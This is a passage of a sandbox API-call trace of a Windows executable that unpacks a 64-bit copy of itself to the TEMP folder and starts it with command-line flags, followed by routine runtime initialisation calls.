Size=0x52) returned 0x647588 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x6475e8 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x6484c8 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x54) returned 0x647620 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x647680 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x6476b0 [0237.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x8c) returned 0x6476e8 [0237.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x647848 | out: hHeap=0x630000) returned 1 [0237.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x6493d8 [0237.974] GetLastError () returned 0x0 [0237.975] SetLastError (dwErrCode=0x0) [0237.975] GetLastError () returned 0x0 [0237.975] SetLastError (dwErrCode=0x0) [0237.975] GetLastError () returned 0x0 [0237.975] SetLastError (dwErrCode=0x0) [0237.975] GetACP () returned 0x4e4 [0237.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x220) returned 0x649be0 [0237.975] GetLastError () returned 0x0 [0237.975] SetLastError (dwErrCode=0x0) [0237.975] IsValidCodePage (CodePage=0x4e4) returned 1 [0237.975] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0237.975] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0237.975] GetLastError () returned 0x0 [0237.976] SetLastError (dwErrCode=0x0) [0237.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.976] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0237.976] GetLastError () returned 0x0 [0237.976] SetLastError (dwErrCode=0x0) [0237.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.976] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.976] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0237.976] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0237.976] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿñ4Ë\x15äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0237.977] GetLastError () returned 0x0 [0237.977] SetLastError (dwErrCode=0x0) [0237.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0237.977] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0237.977] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0237.977] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0237.977] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿñ4Ë\x15äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0237.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x80) returned 0x649e08 [0237.977] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0237.977] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0237.978] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x649e08) returned 0x80 [0237.978] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0237.978] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0237.979] GetCurrentProcess () returned 0xffffffff [0237.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0237.979] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0237.979] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0237.979] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0237.979] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0237.979] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0237.979] LockResource (hResData=0x43c648) returned 0x43c648 [0237.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x649e90 [0237.980] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.980] GetLastError () returned 0x20 [0237.980] GetLastError () returned 0x20 [0237.980] SetLastError (dwErrCode=0x20) [0237.980] GetLastError () returned 0x20 [0237.980] SetLastError (dwErrCode=0x20) [0237.980] GetLastError () returned 0x20 [0237.981] SetLastError (dwErrCode=0x20) [0237.981] GetLastError () returned 0x20 [0237.981] SetLastError (dwErrCode=0x20) [0237.981] GetLastError () returned 0x20 [0237.981] SetLastError (dwErrCode=0x20) [0237.981] GetLastError () returned 0x20 [0237.981] SetLastError (dwErrCode=0x20) [0237.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1000) returned 0x649eb0 [0237.983] WriteFile (in: hFile=0x80, lpBuffer=0x18ea08*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e334, lpOverlapped=0x0 | out: lpBuffer=0x18ea08*, lpNumberOfBytesWritten=0x18e334*=0x49, lpOverlapped=0x0) returned 1 [0237.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6493d8 | out: hHeap=0x630000) returned 1 [0237.985] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0237.985] ExitProcess (uExitCode=0x1) [0237.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6460c8 | out: hHeap=0x630000) returned 1 Process: id = "256" image_name = "tdq963ii64.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe" page_root = "0x164f8000" os_pid = "0x5d0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0x64" cmd_line = "tdq963ii.exe -accepteula \"told.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 863 os_tid = 0x544 [0238.320] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff38 | out: lpSystemTimeAsFileTime=0x12ff38*(dwLowDateTime=0x43f565c0, dwHighDateTime=0x1d68287)) [0238.320] GetCurrentThreadId () returned 0x544 [0238.320] GetCurrentProcessId () returned 0x5d0 [0238.320] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff40 | out: lpPerformanceCount=0x12ff40*=35865889638) returned 1 [0238.321] GetProcessHeap () returned 0x1b0000 [0238.322] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0238.323] GetProcAddress (hModule=0x77940000, lpProcName=0x1400212e0) returned 0x77957190 [0238.323] GetProcAddress (hModule=0x77940000, lpProcName="FlsFree") returned 0x779515b0 [0238.323] GetProcAddress (hModule=0x77940000, lpProcName="FlsGetValue") returned 0x77963520 [0238.323] GetProcAddress (hModule=0x77940000, lpProcName="FlsSetValue") returned 0x7795bd90 [0238.323] GetProcAddress (hModule=0x77940000, lpProcName="InitializeCriticalSectionEx") returned 0x779579b0 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CreateEventExW") returned 0x7798c590 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CreateSemaphoreExW") returned 0x7798c4c0 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadStackGuarantee") returned 0x77948050 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolTimer") returned 0x77948820 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolTimer") returned 0x77a7b2f0 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a6d8c0 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolTimer") returned 0x77a6d620 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CreateThreadpoolWait") returned 0x7798ba80 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadpoolWait") returned 0x77a7e170 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="CloseThreadpoolWait") returned 0x77a6c540 [0238.324] GetProcAddress (hModule=0x77940000, lpProcName="FlushProcessWriteBuffers") returned 0x77ab1f80 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77b2ec60 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentProcessorNumber") returned 0x77ab0040 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetLogicalProcessorInformation") returned 0x7798b820 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="CreateSymbolicLinkW") returned 0x779b5ad0 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="EnumSystemLocalesEx") returned 0x7798c3d0 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="CompareStringEx") returned 0x7798b980 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetDateFormatEx") returned 0x779d0920 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetLocaleInfoEx") returned 0x77943c10 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetTimeFormatEx") returned 0x779cd4e0 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="GetUserDefaultLocaleName") returned 0x7798b790 [0238.325] GetProcAddress (hModule=0x77940000, lpProcName="IsValidLocaleName") returned 0x7798b770 [0238.326] GetProcAddress (hModule=0x77940000, lpProcName="LCMapStringEx") returned 0x7798b710 [0238.326] GetProcAddress (hModule=0x77940000, lpProcName="GetCurrentPackageId") returned 0x0 [0238.326] GetProcAddress (hModule=0x77940000, lpProcName="GetTickCount64") returned 0x77949450 [0238.326] GetProcAddress (hModule=0x77940000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0238.326] GetProcAddress (hModule=0x77940000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0238.326] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x478) returned 0x1cf030 [0238.327] GetCurrentThreadId () returned 0x544 [0238.327] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x28) returned 0x1c5eb0 [0238.327] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0xb00) returned 0x1cf4b0 [0238.327] GetStartupInfoW (in: lpStartupInfo=0x12fe90 | out: lpStartupInfo=0x12fe90*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x14000c2d0, hStdError=0x1cf030)) [0238.327] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0238.327] GetFileType (hFile=0x3) returned 0x2 [0238.328] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4 [0238.328] GetFileType (hFile=0x4) returned 0x3 [0238.328] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0238.328] GetFileType (hFile=0xb) returned 0x2 [0238.328] GetCommandLineW () returned="tdq963ii.exe -accepteula \"told.exe\" -nobanner" [0238.328] GetEnvironmentStringsW () returned 0x1cffd0* [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0xb2a) returned 0x1d0b10 [0238.329] FreeEnvironmentStringsW (penv=0x1cffd0) returned 1 [0238.329] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14002c980, nSize=0x104 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe")) returned 0x33 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x80) returned 0x1d1650 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x138) returned 0x1d16e0 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x8, Size=0x3e) returned 0x1c64f0 [0238.329] RtlAllocateHeap (HeapHandle=0x1b0000, 